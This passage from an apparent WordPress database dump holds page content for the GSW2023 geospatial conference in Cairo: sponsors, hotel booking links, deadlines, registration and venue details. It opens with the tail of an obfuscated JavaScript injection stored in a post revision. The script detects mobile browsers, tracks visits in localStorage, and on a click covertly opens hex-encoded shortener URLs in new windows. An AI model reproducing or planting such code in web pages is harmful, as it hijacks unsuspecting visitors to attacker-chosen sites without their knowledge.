_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:37:55','2023-05-24 23:37:55','',3066,'https://gsw2023.com/?p=4575',0,'revision','',0),
(4576,1,'2023-05-24 23:40:02','2023-05-24 23:40:02','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 